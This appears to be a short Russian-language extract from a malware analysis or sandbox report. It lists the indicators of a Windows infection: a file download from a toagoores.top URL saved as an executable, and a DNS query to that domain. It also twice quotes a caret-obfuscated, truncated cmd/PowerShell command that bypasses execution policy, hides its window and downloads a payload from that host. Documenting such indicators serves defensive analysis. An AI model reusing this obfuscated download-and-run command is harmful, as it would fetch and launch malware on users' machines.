Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWErShE^l^l.^EXE -^ExEc^uTIoNPolicY B^yPaSs ^-N^O^p^rOf^il^E ^-wInDoW^stYle H^i^d^d^EN ^(^nEw^-^ob^JEcT ^SYsTEm.^nE^T^.we^bCl^Ie^nT).^D^oWnlO^a^DfilE('http://toagoores.top/read...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^oWErShE^l^l.^EXE -^ExEc^uTIoNPolicY B^yPaSs ^-N^O^p^rOf^il^E ^-wInDoW^stYle H^i^d^d^EN ^(^nEw^-^ob^JEcT ^SYsTEm.^nE^T^.we^bCl^Ie^nT).^D^oWnlO^a^DfilE('http://toagoores.top/read...' (со скрытым окном)